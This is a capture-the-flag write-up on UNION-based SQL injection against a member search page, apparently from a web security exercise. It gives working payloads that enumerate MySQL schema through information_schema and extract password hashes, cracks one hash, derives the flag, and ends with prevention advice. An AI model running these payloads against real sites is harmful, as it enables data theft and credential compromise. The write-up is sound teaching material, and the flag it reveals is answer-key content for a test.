# PIGGYBACK SQL INJECTION 1

## Explanation

On the member search page, there is an input field.

- OR 1=1 allows us to get all users
  - There is a user which has info :
    - first_name : GetThe
    - last_name : Flag

We see that the user input is used in a **where** SQL statement.
This kind of statement allows for **UNION/piggyback** injections, which allow to retrieve other tables information

### 1. Getting DB information

if we leave the input empty and validate the form :
- Empty search : *You have an error in your SQL syntax; check the manual that corresponds to your **MySQL server** version for the right syntax to use ...*
  - => We know that the SQL engine is MySQL

Running the two following commands, we get all the usefull tables / columns available in the database
- 1 AND 1=2 UNION SELECT table_schema, table_name FROM information_schema.tables
- 1 AND 1=2 UNION SELECT table_name, column_name, 1 FROM information_schema.columns

- SCHEMA: Member_Sql_Injection
- TABLE: users
- COLUMNS :
  - user_id
  - first_name
  - last_name
  - town
  - country
  - planet
  - countersign
  - Commentaire

### 2. Getting the flag


- 1 UNION SELECT countersign, first_name FROM Member_Sql_Injection.users
  - => We see here that the countersign column contains some hashes, but no flag.

- 1 UNION SELECT first_name, Commentaire FROM Member_Sql_Injection.users
  - => We see here that the Commentaire for user GetTheFlag is *“Decrypt this password -> then lower all the char. Sha256 on it and it's good !”*

- 1 UNION SELECT Commentaire, countersign FROM Member_Sql_Injection.users
  - 5ff9d0165b4f92b14994e5c685cdce28 == FortyTwo
  - fortytwo SHA256  == 10a16d834f9b1e4068b25c4c46fe0284e99e44dceaf08098fc83925ba6310ff5

## Exploitation

**This vulnerability ranks number 1 in OWASP's top 10 Web Application Security Risk**

Different types of SQL injections allow the attacker to perform various things.
> - Data loss
> - Data corruption
> - Disclosure of information
> - Denial of access
> - Sometimes complete takeover of the system

## Prevention

> - Use an ORM
> - Escape characters (does not protect numeric fields)
> - Use Prepared statements => input won't be interpreted as SQL code anymore
> - Use LIMIT and other SQL controls within queries to prevent mass disclosure of records in case of SQL injection.

## Documentation

- [OWASP - TOP 10 - sql injection](https://owasp.org/www-project-top-ten/2017/A1_2017-Injection)
- [OWASP - sql injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [portswigger - UNION attacks](https://portswigger.net/web-security/sql-injection/union-attacks)
